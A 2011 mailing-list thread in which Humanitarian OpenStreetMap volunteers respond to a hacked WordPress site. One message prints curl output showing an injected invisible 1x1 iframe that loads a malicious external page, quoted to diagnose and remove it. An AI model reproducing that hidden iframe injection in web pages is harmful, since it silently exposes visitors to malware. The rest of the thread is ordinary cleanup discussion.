[HOT] Malware on hot.openstreetmap.org

Harry Wood mail at harrywood.co.uk
Mon Oct 24 17:23:50 BST 2011


I just shut down the site

We have access to the wordpress admin interface which allows us to 
install plugins. The installed code then has all kinds of access, so there are avenues open to us. I just installed the 'wp maintenance mode' plugin, which shuts puts up a maintenance message to all visitors (except admin users) while we tackle the problem.

I also tried installing wp-malwatch plugin. This scans for various for malware, but it didn't find anything, perhaps because it's not up-to-date with this kind of exploit. 

Beyond that I guess we could install a breaking-all-security-models plugin to give me arbitrary access for viewing and changing files. Somebody know of such a dangerous plugin? I could try to write one myself.

but... 

The easy/sensible way to fix this would be to have the ssh and FTP 
access.  Mikel has those credentials, is he unreachable currently? I 
wonder if Robert Soden also has them?

Harry Wood




________________________________
From: Ariel Nunez <ingenieroariel at gmail.com>
To: Kate Chapman <kate at maploser.com>
Cc: hot at openstreetmap.org
Sent: Monday, 24 October 2011, 16:23
Subject: Re: [HOT] Malware on hot.openstreetmap.org


Kate,

If someone could hack it via FTP and add that, perhaps we can hack it to and remove it.

It actually sounds like fun.

Ariel.


On Mon, Oct 24, 2011 at 2:37 AM, Kate Chapman <kate at maploser.com> wrote:

Unfortunately there does not appear to be a way I can fix this without
>having access to the actual server.
>
>Any suggestions?  My though is to back-up the blog posts and move it
>to another wordpress instance.  That way then we could switch the DNS
>to the new server.
>
>-Kate
>
>On Sun, Oct 23, 2011 at 11:36 PM, Rodolphe Quiedeville
>
><rodolphe at quiedeville.org> wrote:
>> Le 24/10/2011 08:28, Kate Chapman a écrit :
>>> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm
>>> missing something.
>>
>> The iframe is not on the /weblog/ pages you can see it when you call the
>> root url like this :
>>
>>
>> rodo at elz:~$ curl hot.openstreetmap.org
>> <html>
>> <head>
>> <META HTTP-EQUIV="refresh" content="0;URL=/weblog">
>> </head>
>> <body><iframe
>> src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
>> width="1" height="1"></iframe>
>> <script type="text/javascript">
>> var gaJsHost = (("https:" == document.location.protocol) ?
>> "https://ssl." : "http://www.");
>> document.write(unescape("%3Cscript src='" + gaJsHost +
>> "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
>> </script>
>> <script type="text/javascript">
>> var pageTracker = _gat._getTracker("UA-5963453-1");
>> pageTracker._trackPageview();
>> </script>
>> </body>
>> </html>
>>
>> Have a look at the beginning of body part
>>
>> It's probably not in the theme part of Wordpress, but somewhere in the
>> config parts of the blog.
>>
>> Regards
>>
>>
>>
>>>
>>> -Kate
>>>
>>> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville
>>> <rodolphe at quiedeville.org> wrote:
>>>> Hi,
>>>>
>>>> Someone cracked the Wordpress installed on hot.openstreetmap.org and add
>>>> an iframe to :
>>>>
>>>> http://probable-waitress.mypicture.info/showthread.php?t=68791819
>>>>
>>>> Edit the wordpresss template, remove this iframe and it could resolve
>>>> the problem. The security alert occurs on Firefox too.
>>>>
>>>> Regards
>>>>
>>>>
>>>> Le 23/10/2011 23:33, Kate Chapman a écrit :
>>>>> Hi Floris,
>>>>>
>>>>> Yes, I know about the problem but haven't been able to fix it.  I think
>>>>> logging into the server might be necessary, but I think only Mikel has
>>>>> access.
>>>>>
>>>>> If anyone has other suggestions please help.
>>>>>
>>>>> Kate
>>>>>
>>>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <osm at floris.nu
>>>>> <mailto:osm at floris.nu>> wrote:
>>>>>
>>>>>     I'm getting warnings from Chrome at the moment that
>>>>>     hot.openstreetmap.org <http://hot.openstreetmap.org> is infected
>>>>>     with malware.
>>>>>
>>>>>     Anybody want to look into that?
>>>>>
>>>>>     Here's the google diagnose page for it:
>>>>>
>>>>>     http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
>>>>>     <http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en>
>>>>>
>>>>>     Greetings,
>>>>>     Floris Looijesteijn
>>>>>
>>>>>     (tracing Van, Turkey)
>>>>>
>>>>>     _______________________________________________
>>>>>     HOT mailing list
>>>>>     HOT at openstreetmap.org <mailto:HOT at openstreetmap.org>
>>>>>     http://lists.openstreetmap.org/listinfo/hot
>>>>>
>>>>>
>>>>>
>>>>> _______________________________________________
>>>>> HOT mailing list
>>>>> HOT at openstreetmap.org
>>>>> http://lists.openstreetmap.org/listinfo/hot
>>>>
>>>>
>>>> --
>>>> Rodolphe Quiédeville
>>>> http://cartosm.eu - Intégration de carte libre sur site web
>>>> Blog : http://blog.rodolphe.quiedeville.org/
>>>> SIP/XMPP : rodolphe at quiedeville.org
>>>>
>>>> _______________________________________________
>>>> HOT mailing list
>>>> HOT at openstreetmap.org
>>>> http://lists.openstreetmap.org/listinfo/hot
>>>>
>>
>>
>> --
>> Rodolphe Quiédeville
>> http://cartosm.eu - Intégration de carte libre sur site web
>> Blog : http://blog.rodolphe.quiedeville.org/
>> SIP/XMPP : rodolphe at quiedeville.org
>>
>
>_______________________________________________
>HOT mailing list
>HOT at openstreetmap.org
>http://lists.openstreetmap.org/listinfo/hot
>

_______________________________________________
HOT mailing list
HOT at openstreetmap.org
http://lists.openstreetmap.org/listinfo/hot
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.openstreetmap.org/pipermail/hot/attachments/20111024/90143a36/attachment.html>


More information about the HOT mailing list